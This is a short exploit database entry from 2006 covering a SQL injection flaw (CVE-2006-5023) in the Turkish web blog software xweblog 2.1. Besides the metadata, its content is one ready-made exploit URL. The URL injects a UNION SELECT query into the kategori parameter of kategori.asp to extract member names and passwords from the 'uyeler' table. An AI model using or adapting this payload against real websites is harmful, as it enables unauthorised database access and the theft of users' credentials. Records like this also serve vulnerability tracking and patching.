xweblog 2.1 - 'kategori.asp' SQL Injection
Author: Muhacir
type: webapps
platform: asp
port:
date_added: 2006-09-21
date_updated:
verified: 1
codes: OSVDB-29103;CVE-2006-5023
tags:
aliases:
screenshot_url:
application_url:
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir
# Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :)
# milw0rm.com [2006-09-22]